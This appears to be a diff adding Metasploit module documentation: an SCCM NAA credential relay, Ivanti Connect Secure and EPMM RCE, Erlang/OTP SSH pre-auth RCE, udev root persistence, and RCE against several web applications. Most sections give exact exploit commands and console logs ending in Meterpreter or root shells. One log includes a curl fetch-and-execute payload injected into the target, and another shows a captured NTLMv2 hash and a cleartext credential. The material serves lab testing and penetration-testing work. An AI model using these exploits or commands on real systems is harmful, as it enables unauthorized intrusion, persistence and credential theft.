+ Name           Attributes
+ ----           ----------
+ cn             SMS-MP-P01-MECM.SCCM.LAB
+ dnshostname    MECM.sccm.lab
+ mssmssitecode  P01
+
+[*] Query returned 1 result.
+[*] Auxiliary module execution completed
+```
+
+### Initiating SMB authentication from a Windows Host
+Currently the SMB auth attempt must originate from a Windows Host, see: https://github.com/rapid7/metasploit-framework/issues/19951
+```
+net use \\192.168.56.1\foo /u:SCCM.LAB\DESKTOP-5FJM1832$ JpnYZ43YHqmoOLj9xBKdI9tVFgDXtfsu
+```
+
+### Running the module
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > msf6 exploit(windows/local/cve_2024_35250_ks_driver) > use relay_get
+
+Matching Modules
+================
+
+   #  Name                                              Disclosure Date  Rank    Check  Description
+   -  ----                                              ---------------  ----    -----  -----------
+   0  auxiliary/server/relay/relay_get_naa_credentials  .                normal  Yes    SMB to HTTP relay version of Get NAA Creds
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/server/relay/relay_get_naa_credentials
+
+[*] Using auxiliary/server/relay/relay_get_naa_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+msf6 auxiliary(server/relay/relay_get_naa_credentials) >  dns add-static mecm.sccm.lab 192.168.56.11
+[*] Added static hostname mapping mecm.sccm.lab to 192.168.56.11
+msf6 auxiliary(server/relay/relay_get_naa_credentials) > run rhost=192.168.56.11 smbdomain=sccm.lab MANAGEMENT_POINT=MECM.sccm.lab SITE_CODE=P01
+[*] Auxiliary module running as background job 0.
+
+[*] Checking endpoint on http://192.168.56.11:80/ccm_system_windowsauth/request
+msf6 auxiliary(server/relay/relay_get_naa_credentials) > [*] SMB Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+[*] New request from 192.168.56.1
+[*] Received request for SCCM.LAB\DESKTOP-5FJM1832$
+[*] Relaying to next target http://192.168.56.11:80/ccm_system_windowsauth/request
+[+] Identity: SCCM.LAB\DESKTOP-5FJM1832$ - Successfully authenticated against relay target http://192.168.56.11:80/ccm_system_windowsauth/request
+[SMB] NTLMv2-SSP Client     : 192.168.56.11
+[SMB] NTLMv2-SSP Username   : SCCM.LAB\DESKTOP-5FJM1832$
+[SMB] NTLMv2-SSP Hash       : DESKTOP-5FJM1832$::SCCM.LAB:42465e4768dcb113:c5248825d2326b730a23ff5986cc36d8:0101000000000000662037ebd78edb01344978b20c2f7baa0000000002000e005300430043004d004c0041004200010008004d00450043004d00040010007300630063006d002e006c006100620003001a004d00450043004d002e007300630063006d002e006c0061006200050010007300630063006d002e006c006100620007000800662037ebd78edb01060004000200000008003000300000000000000001000000002000002cd075c2fac7f6ea5a6a290f03ae2e6476afc69a4e85c3e91bab8a5ac0d7603e0a001000000000000000000000000000000000000900220063006900660073002f003100390032002e003100360038002e00350036002e0031000000000000000000
+
+[+] This your capitan speaking we've reached the on_relay_success method :)
+[*] Got SMS ID: D61057A2-0B02-40B3-9ADC-F349BA5EC8C2
+[*] Waiting 10 seconds for SCCM DB to update...
+[*] Found policy containing secrets: http://<mp>/SMS_MP/.sms_pol?{e98163c7-7b3a-4c3d-bb69-2b398c492290}.2_00
+[+] Found valid NAA credentials: sccm.lab\sccm-naa:123456789
+[*] Received request for SCCM.LAB\DESKTOP-5FJM1832$
+[*] Identity: SCCM.LAB\DESKTOP-5FJM1832$ - All targets relayed to
+[*] New request from 192.168.56.1
+[*] Received request for SCCM.LAB\DESKTOP-5FJM1832$
+[*] Identity: SCCM.LAB\DESKTOP-5FJM1832$ - All targets relayed to
+[*] Received request for SCCM.LAB\DESKTOP-5FJM1832$
+[*] Identity: SCCM.LAB\DESKTOP-5FJM1832$ - All targets relayed to
+[*] Received request for SCCM.LAB\DESKTOP-5FJM1832$
+[*] Identity: SCCM.LAB\DESKTOP-5FJM1832$ - All targets relayed to
+```
@@ -2,7 +2,7 @@

 This module supports running an SMB server which validates credentials, and
 then attempts to execute a relay attack against an LDAP server on the
-configured RELAY_TARGETS hosts.
+configured RHOSTS hosts.

 It is not possible to relay NTLMv2 to LDAP due to the Message Integrity Check
 (MIC). As a result, this will only work with NTLMv1. The module takes care of
@@ -65,11 +65,11 @@ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    LmCompatibilityLevel    REG_DWORD    0x2
 ```

-Finally run the relay server on msfconsole, setting the `RELAY_TARGETS` option
+Finally run the relay server on msfconsole, setting the `RHOSTS` option
 to the Domain Controller IP address.

 ```
-run verbose=true RELAY_TARGETS=192.168.232.110
+run verbose=true RHOSTS=192.168.232.110
 ```

 You will have to coerce the Domain Computer and force it to authenticate to the
@@ -78,7 +78,7 @@ msfconsole server (see an example below).

 ## Options

-### RELAY_TARGETS
+### RHOSTS

 Target address range or CIDR identifier to relay to.

@@ -107,7 +107,7 @@ The domain name used during SMB exchange.
 ### Start the relay server
 ```
 msf6 > use auxiliary/server/relay/smb_to_ldap
-msf6 auxiliary(server/relay/smb_to_ldap) > run verbose=true RELAY_TARGETS=192.168.232.110
+msf6 auxiliary(server/relay/smb_to_ldap) > run verbose=true RHOSTS=192.168.232.110
 [*] Auxiliary module running as background job 0.
 msf6 auxiliary(server/relay/smb_to_ldap) >
 [*] SMB Server is running. Listening on 0.0.0.0:445
@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+This module exploits a Stack-based Buffer Overflow vulnerability in Ivanti
+Connect Secure to achieve remote code execution (CVE-2025-22457). Versions
+22.7R2.5 and earlier are vulnerable. Note that Ivanti Pulse Connect Secure,
+Ivanti Policy Secure and ZTA gateways are also vulnerable but this module
+doesn't support this software. Heap spray is used to place our payload in
+memory at a predetermined location. Due to ASLR, the base address of
+`libdsplibs` is unknown. This library is used by the exploit to build a ROP
+chain and get command execution. As a result, the module will brute force this
+address starting from  the address set by the `LIBDSPLIBS_ADDRESS` option.
+
+Since this module needs to fill the processes memory with a large structure
+using the heap spray technique, it might take a very long time to succeed. The
+execution can be tweeked with the options described below.
+
+Also, since this will create many sockets on your system, you might need to
+increase the file descriptor limit with `ulimit` (e.g. `ulimit -n 65535`).
+
+### Installation Steps
+Get an Ivanti Security Appliance (ISA) or a Virtual Appliances (ISA-V Series)
+with a vulnerable Ivanti Connect Secure installed.
+
+Note that it is not possible to download a trial version of a Virtual Appliance
+unless you contact sales and request a demo.
+
+## Verification Steps
+1. Start msfconsole
+1. Do: `use linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457`
+1. Do: `exploit verbose=true lhost=<local host> rhosts=<remote host>`
+1. You should get a Meterpreter session
+
+
+## Options
+
+### MAX_THREADS
+The maximum number of threads to use when spraying (default: 32)
+
+### WEB_CHILDREN
+The number of `/home/bin/web` child processes the server uses. It's been
+observed that the number of children the main process forks is directly related
+to the number of vCPUs used by the system. Ivanti recommends having 4 vCPUs, so
+the default number of children is set to 4.
+Note that this option should be set properly, since the exploit needs to send enough
+spray patterns to fill the memory of each child process. This is mandatory,
+since we don’t control which child process will be used to trigger the
+vulnerability. If we send too much data, the process memory will overflow and
+the process will crash. A `Broken pipe` socket error will happen in this case.
+So, if the number of `WEB_CHILDREN` is too low (< vCPUs), we might not send
+enough data to fill the memory of every child process and the exploit would
+likely fail. This scenario cannot be detected since the child processes should
+not crash. The module will simply continue to brute force with a different base
+address of `libdsplibs`, without detecting the real issue. On the other hand,
+if we send too much data, the child processes will crash and we will need to
+start everything again with a lower `WEB_CHILDREN` value.
+
+### LIBDSPLIBS_ADDRESS
+The base address of libdsplibs that the module will start with when brute
+forcing. It has been observed that this address is always in the range of
+`0xf6525000`-`0xf6426000`, giving 256 possible options, since the alignment is
+4KB (0x1000 bytes) bytes. As a result, the default value has been set to
+`0xf6426000`.
+
+### BRUTEFORCE_ATTEMPTS
+The number of attempts to brute force the base address of libdsplibs (default: 255).
+
+
+## Scenarios
+
+### Ivanti Connect Secure version 22.7r2.4 b3597
+
+In this example, the address of libdsplibs is known to speed up the process (0xf64c1000). Also, we know the target system runs with 2 vCPUs.
+
+```
+msf6 exploit(linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457) > exploit verbose=true lhost=192.168.222.97 rhosts=192.168.222.222 libdsplibs_address=0xf64c1000 web_children=2
+[*] Command to run on remote host: curl -so ./pbPNUixqDiK http://192.168.222.97:8080/QAeBnT-6WHJiW5MJjwMrfA;chmod +x ./pbPNUixqDiK;./pbPNUixqDiK&
+[*] Fetch handler listening on 192.168.222.97:8080
+[*] HTTP server started
+[*] Adding resource /QAeBnT-6WHJiW5MJjwMrfA
+[*] Started reverse TCP handler on 192.168.222.97:4444
+[*] 192.168.222.222:443 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.222.222:443 - Checking the product version for https://192.168.222.222:443
+[+] 192.168.222.222:443 - The target appears to be vulnerable. Detected version: 22.7.2.3597
+[*] 192.168.222.222:443 - shell_cmd: a;export LD_LIBRARY_PATH=/home/lib;curl -so ./pbPNUixqDiK http://192.168.222.97:8080/QAeBnT-6WHJiW5MJjwMrfA;chmod +x ./pbPNUixqDiK;./pbPNUixqDiK& #BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
+[*] 192.168.222.222:443 - Targeting https://192.168.222.222:443
+[*] 192.168.222.222:443 - Starting...
+[*] 192.168.222.222:443 - Trying libdsplibs.so @ 0xf64c1000
+[*] 192.168.222.222:443 - Making connections...
+[*] 192.168.222.222:443 - Spraying...
+[*] 192.168.222.222:443 - Triggering...
+[*] 192.168.222.222:443 - Attempt #1
+[*] 192.168.222.222:443 - Attempt #2
+[*] Client 192.168.222.222 requested /QAeBnT-6WHJiW5MJjwMrfA
+[*] Sending payload to 192.168.222.222 (curl/7.80.0-DEV)
+[*] Meterpreter session 1 opened (192.168.222.97:4444 -> 192.168.222.222:16758) at 2025-04-30 21:36:49 +0200
+[!] 192.168.222.222:443 - Exception: The connection with (192.168.222.222:443) timed out.
+[*] 192.168.222.222:443 - Attempt elapsed time: 222.46986142301466 seconds
+[*] 192.168.222.222:443 - Total elapsed time: 227.48146175200236 seconds
+
+meterpreter > sysinfo
+Computer     : 192.168.222.222
+OS           : CentOS 7.9.2009 (Linux 4.17.00.35-selinux-jailing-production)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: nr
+```
@@ -0,0 +1,43 @@
+This is a post module that performs a persistence installation on a Linux system using [udev](https://en.wikipedia.org/wiki/Udev).
+The persistence execution with be triggered with root privileges everytime a network interface other than l0 comes up.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Obtain a session on the target machine
+  3. `use exploit/linux/local/udev_persistence`
+  4. `set session -1`
+  5. `exploit`
+
+## Module usage
+
+```
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use exploit/linux/local/udev_persistence
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/udev_persistence) > set session -1
+session => -1
+msf6 exploit(linux/local/udev_persistence) > exploit
+
+[*] /usr/bin/udev-check-updates written
+[*] /lib/udev/rules.d/99-update.rules written
+msf6 exploit(linux/local/udev_persistence) > 
+[*] Sending stage (3045380 bytes) to 172.18.49.39
+[*] Meterpreter session 2 opened (172.18.52.45:4444 -> 172.18.49.39:41848) at 2024-09-13 03:59:47 -0400
+msf6 exploit(linux/local/udev_persistence) > sessions -i -1
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```
+
+## Options
+
+### BACKDOOR_PATH
+
+Specify the path of the file containing the udev rules. (Default: /lib/udev/rules.d/99-update.rules)
+
+### PAYLOAD_PATH
+
+Specify the name of the payload to execute upon persistence. (Default: /usr/bin/udev-check-updates)
+
@@ -0,0 +1,172 @@
+## Vulnerable Application
+
+Erlang/OTP is a set of libraries for the Erlang programming language.
+
+Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker
+to perform unauthenticated remote code execution (RCE).
+
+By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access
+to affected systems and execute arbitrary commands without valid credentials. This issue is patched in
+versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.
+
+### Introduction
+
+This module detect and exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH
+servers that allows remote command execution. By sending crafted SSH packets, it executes a payload to
+establish a reverse shell on the target system.
+
+The exploit leverages a flaw in the SSH protocol handling to execute commands via the Erlang `os:cmd`
+function without requiring authentication.
+
+## Testing
+
+### Vulnerable application
+
+Execute the following commands:
+
+```bash
+git clone https://github.com/ProDefense/CVE-2025-32433
+cd CVE-2025-32433
+docker build -t cve-ssh:latest .
+docker run -d -p 2222:2222 cve-ssh:latest
+```
+
+### Patched application
+
+Execute the following commands:
+
+```bash
+git clone https://github.com/exa-offsec/ssh_erlangotp_rce
+cd ssh_erlangotp_rce/patched
+docker build -t patched-ssh:latest .
+docker run -d -p 2223:2223 patched-ssh:latest
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/linux/ssh/ssh_erlangotp_rce`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Scenarios
+
+### Using linux commands (Target 0)
+
+Use the linux commands CMD.
+
+```
+msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options 
+
+Module options (exploit/linux/ssh/ssh_erlangotp_rce):
+
+   Name       Current Setting      Required  Description
+   ----       ---------------      --------  -----------
+   RHOSTS     192.168.0.1          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      2222                 yes       The target port (TCP)
+   SSH_IDENT  SSH-2.0-OpenSSH_8.9  yes       SSH client identification string sent to the server
+
+Payload options (cmd/linux/https/x64/meterpreter/reverse_tcp):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   FETCH_CHECK_CERT  false            yes       Check SSL certificate
+   FETCH_COMMAND     CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE      false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS    false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_SRVHOST                      no        Local IP to use for serving payload
+   FETCH_SRVPORT     8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                      no        Local URI to use for serving payload
+   LHOST             192.168.0.1      yes       The listen address (an interface may be specified)
+   LPORT             4444             yes       The listen port
+
+   When FETCH_FILELESS is false:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      tVzpeXtmX        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run
+[*] Started reverse TCP handler on 192.168.0.1:4444 
+[*] 192.168.0.1:2222 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.0.1:2222 - Starting scanner for CVE-2025-32433
+[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.0.1:2222 - The target is vulnerable.
+[*] 192.168.0.1:2222 - Starting exploit for CVE-2025-32433
+[+] 192.168.0.1:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
+[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.0.1:2222 - Payload sent successfully
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 172.17.0.2:35770) at 2025-04-27 20:23:02 +0400
+
+meterpreter > 
+```
+
+### Using unix commands (Target 1)
+
+Use the unix commands CMD.
+
+```
+msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options 
+
+Module options (exploit/linux/ssh/ssh_erlangotp_rce):
+
+   Name       Current Setting      Required  Description
+   ----       ---------------      --------  -----------
+   RHOSTS     192.168.0.1          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      2222                 yes       The target port (TCP)
+   SSH_IDENT  SSH-2.0-OpenSSH_8.9  yes       SSH client identification string sent to the server
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.0.1      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Unix Command
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run
+[*] Started reverse TCP handler on 192.168.0.1:4444 
+[*] 192.168.0.1:2222 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.0.1:2222 - Starting scanner for CVE-2025-32433
+[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.0.1:2222 - The target is vulnerable.
+[*] 192.168.0.1:2222 - Starting exploit for CVE-2025-32433
+[+] 192.168.0.1:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
+[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.0.1:2222 - Payload sent successfully
+[*] Command shell session 1 opened (192.168.0.1:4444 -> 172.17.0.2:59042) at 2025-04-27 20:24:41 +0400
+
+whoami
+root
+```
+
+## References
+
+1. <https://x.com/Horizon3Attack/status/1912945580902334793>
+2. <https://platformsecurity.com/blog/CVE-2025-32433-poc>
+3. <https://github.com/ProDefense/CVE-2025-32433>
@@ -0,0 +1,123 @@
+## Vulnerable Application
+
+The **Online Car Rental System 1.0** is vulnerable to **Authenticated Remote Code Execution (RCE)** due to an insecure file upload mechanism. Specifically, the `changeimage1.php` endpoint in the admin panel does not validate uploaded file types, allowing authenticated users to upload arbitrary PHP scripts. These scripts can be accessed and executed via a predictable file path, leading to full remote code execution.
+
+You can download the vulnerable software from the following link:
+🔗 [Online Car Rental System 1.0 - Source Code](https://code-projects.org/online-car-rental-using-php-source-code/)
+
+This module exploits the vulnerability by authenticating to the admin panel, uploading a malicious PHP payload
+using the vulnerable endpoint, and executing it to gain remote access.
+
+- **CVE**: [CVE-2024-57487](https://nvd.nist.gov/vuln/detail/CVE-2024-57487)
+- **Author**: Aaryan Golatkar
+- **Disclosure Date**: 13/01/2025
+
+---
+
+## Verification Steps
+
+### Vulnerable Application Installation Setup
+
+#### For Windows:
+1. Start Apache and MySQL via the **XAMPP Control Panel**.
+2. Extract the Online Car Rental System 1.0 source code.
+3. Place the extracted folder inside `htdocs` (e.g., `C:\xampp\htdocs\carrental`).
+4. Navigate to `http://localhost/phpmyadmin` in your browser.
+5. Create a database (e.g., `carrental_db`), and import the SQL dump (`carrental.sql`) provided in the `database` directory.
+6. Visit `http://localhost/carrental/` to verify installation.
+
+#### For Linux:
+1. Start services: `sudo systemctl start apache2 && sudo systemctl start mysql`
+2. Install PHPMyAdmin: `sudo apt install phpmyadmin -y`
+3. Edit `/etc/apache2/apache2.conf` and append:
+   ```
+   Include /etc/phpmyadmin/apache.conf
+   ```
+4. Extract the project into `/var/www/html/`
+5. Follow the same steps as Windows from here onward.
+
+---
+
+## Exploit Module Usage
+
+### Start msfconsole and load the exploit:
+
+```bash
+msfconsole
+use exploit/multi/http/carrental_fileupload_rce
+```
+
+### Set the required options:
+
+```bash
+set rhosts <target_ip>
+set rport <port>
+set targeturi /carrental
+set username <admin_username>      # Default: admin
+set password <admin_password>      # Default: Test@12345
+set lhost <your_ip>
+set lport <your_port>
+```
+
+---
+
+## Checking Target Vulnerability
+
+```bash
+check
+```
+
+If vulnerable, you will see:
+
+```
+[+] <IP> The target appears to be the Online Car Rental System.
+```
+
+---
+
+## Launching the Exploit
+
+```bash
+exploit
+```
+
+If successful, you will receive a Meterpreter shell.
+
+---
+
+## Scenarios
+
+```bash
+msf exploit(multi/http/carrental_fileupload_rce) > check
+[*] Checking if target is vulnerable...
+[+] 192.168.1.103:80 - The target appears to be the Online Car Rental System.
+
+msf exploit(multi/http/carrental_fileupload_rce) > exploit
+[*] Started reverse TCP handler on 192.168.1.104:4444 
+[*] Uploading PHP Meterpreter payload as WxAqV7.php...
+[+] Payload uploaded successfully!
+[*] Executing the uploaded shell at /carrental/admin/img/vehicleimages/WxAqV7.php...
+[*] Sending stage (40004 bytes) to 192.168.1.103
+[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.103:60615)
+
+meterpreter > sysinfo
+Computer    : DESKTOP-1234
+OS          : Windows NT 10.0 build 19045 (Windows 10)
+Meterpreter : php/windows
+```
+
+---
+
+## Options
+
+| Option       | Required | Description                                           |
+|--------------|----------|-------------------------------------------------------|
+| `TARGETURI`  | Yes      | The base path to the Car Rental System (e.g., `/carrental`) |
+| `USERNAME`   | Yes      | Admin username (default: `admin`)                    |
+| `PASSWORD`   | Yes      | Admin password (default: `Test@12345`)               |
+| `RHOSTS`     | Yes      | The target IP address                                |
+| `RPORT`      | Yes      | The target web server port (default: 80)             |
+| `LHOST`      | Yes      | The local host to receive the reverse shell          |
+| `LPORT`      | Yes      | The local port to receive the reverse shell          |
+
+---
@@ -0,0 +1,68 @@
+## Vulnerable Application
+Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability
+(CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.
+
+## Verification Steps
+
+### Vulnerable Application Installation Setup
+1. Install Clinic's Patient Management System on your web server.
+   - Download the Web Application from [here](https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code)
+
+2. Start `msfconsole` and load the exploit module:
+```bash
+   msfconsole
+   use exploit/multi/http/clinic_pms_sqli_to_rce
+```
+
+3. Set the required options:
+```bash
+   set rport <port>
+   set rhost <ip>
+   set targeturi /pms
+```
+
+4. Check if the target is vulnerable:
+```bash
+   check
+```
+
+   If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
+```
+   [+] <IP> The target is vulnerable.
+```
+
+5. Set up the listener for the exploit:
+```bash
+   set lport <port>
+   set lhost <ip>
+```
+
+6. Launch the exploit:
+```bash
+   exploit
+```
+
+7. If successful, you will receive a PHP Meterpreter shell.
+
+## Options
+- `TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).
+
+## Scenarios
+
+```bash
+msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > exploit
+[*] Started reverse TCP handler on 192.168.168.128:4444
+[*] Logged using SQL injection..
+[*] Malicious file uploaded..
+[*] Logged out..
+[*] Logged using SQL injection..
+[*] Sending stage (40004 bytes) to 192.168.168.146
+[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:52522) at 2025-05-13 13:33:52 +0200
+
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
+Meterpreter : php/linux
+
+```
+
@@ -0,0 +1,134 @@
+## Vulnerable Application
+
+This Metasploit module exploits a remote-code injection in Invision Community ≤ 5.0.6 via the **theme editor**’s `customCss` endpoint:
+
+* **CVE-2025-47916**: malformed `{expression="…"}` allows evaluation of arbitrary PHP expressions in the `content` parameter.
+
+### To replicate a vulnerable environment
+
+1. **Download the pre-built Docker lab** (includes `Dockerfile`, `docker-compose.yml` and the IPS 5.0.6 application):
+
+```bash
+wget https://archive.org/download/ips-5.0.6/IPS-5.0.6.zip -O ips_5.0.6_lab.zip
+mkdir ips_5.0.6_lab_dir
+unzip ips_5.0.6_lab.zip -d ips_5.0.6_lab_dir
+cd ips_5.0.6_lab_dir
+```
+
+2. **Bring up the stack**:
+
+```bash
+docker-compose up -d
+```
+
+3. **Complete the installer** by browsing to [http://localhost:7777](http://localhost:7777).
+
+   * You do **not** need a valid license key; you can enter any text and proceed.
+   * Use database host `db`, user `ipsuser`, password `ipspass`, database `ipsdb`.
+
+## Verification Steps
+
+1. **Check the installed version**:
+
+```bash
+curl -s http://localhost:7777/admin/install/eula.txt | head -n5
+```
+
+Expected output:
+
+```
+=============================[NOTE]=============================
+ Buy license at https://invisioncommunity.com/buy/self-hosted/
+================================================================
+ IPS 5.0.6 (5000074)
+=============================[NOTE]=============================
+```
+
+2. **In `msfconsole`**, confirm the module’s `check` returns vulnerable:
+
+```bash
+use exploit/multi/http/invision_customcss_rce
+set RHOSTS 127.0.0.1
+set TARGETURI /
+check
+```
+
+## Options
+
+No option
+
+## Scenarios
+
+### PHP Meterpreter (in-memory)
+
+```bash
+use exploit/multi/http/invision_customcss_rce
+set TARGET 0
+set RHOSTS 127.0.0.1
+set TARGETURI /
+set PAYLOAD php/meterpreter/reverse_tcp
+set LHOST 192.168.1.10
+set LPORT 4444
+run
+```
+
+### Command Shell (ARCH_CMD)
+
+```bash
+use exploit/multi/http/invision_customcss_rce
+set TARGET 1
+set RHOSTS 127.0.0.1
+set TARGETURI /
+set payload cmd/linux/http/x64/meterpreter_reverse_tcp
+set LHOST 192.168.1.10
+set LPORT 4444
+run
+```
+
+## Expected Results
+
+With `php/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/invision_customcss_rce) > run http://localhost:7777
+[*] Exploiting target 127.0.0.1
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected IPS version: 5.0.6
+[+] The target is vulnerable. IPS version 5.0.6 is vulnerable (≤ 5.0.6)
+[*] Sending exploit to 127.0.0.1:7777 ...
+[*] Sending stage (40004 bytes) to 172.30.0.3
+[*] Meterpreter session 9 opened (192.168.1.36:4444 -> 172.30.0.3:34414) at 2025-05-20 18:13:55 +0200
+[*] Session 9 created in the background.
+msf6 exploit(multi/http/invision_customcss_rce) > sessions 9
+[*] Starting interaction with 9...
+
+meterpreter > sysinfo
+Computer    : 01ed59644450
+OS          : Linux 01ed59644450 6.14.6-2-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 10 May 2025 20:09:10 +0000 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter_reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/invision_customcss_rce) > run http://localhost:7777
+[*] Exploiting target 127.0.0.1
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected IPS version: 5.0.6
+[+] The target is vulnerable. IPS version 5.0.6 is vulnerable (≤ 5.0.6)
+[*] Sending exploit to 127.0.0.1:7777 ...
+[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 172.30.0.3:46552) at 2025-05-20 18:11:35 +0200
+[*] Session 7 created in the background.
+msf6 exploit(multi/http/invision_customcss_rce) > sessions 7
+[*] Starting interaction with 7...
+
+meterpreter > sysinfo
+Computer     : 172.30.0.3
+OS           : Debian 12.10 (Linux 6.14.6-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,78 @@
+## Vulnerable Application
+This module exploits an unauthenticated remote code execution exploit chain for Ivanti EPMM,
+tracked as CVE-2025-4427 and CVE-2025-4428. An authentication flaw permits unauthenticated
+access to an administrator web API endpoint, which allows for code execution via expression
+language injection. This module executes in the context of the 'tomcat' user. This module
+should also work on many versions of MobileIron Core (rebranded as Ivanti EPMM).
+
+## Testing
+To set up a test environment:
+1. Set up an Ivanti EPMM or MobileIron Core VM appliance.
+2. Configure basic networking and confirm that the web service on port 443 is reachable.
+3. Follow the verification steps below.
+
+## Options
+No custom options exist for this module.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `run`
+
+## Scenarios
+### Ivanti EPMM (MobileIron Core) Linux Target
+```
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > show options
+
+Module options (exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, so
+                                         cks4, socks5, socks5h, http
+   RHOSTS     10.5.132.244     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
+                                         asploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             yes       Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to Ivanti EPMM
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
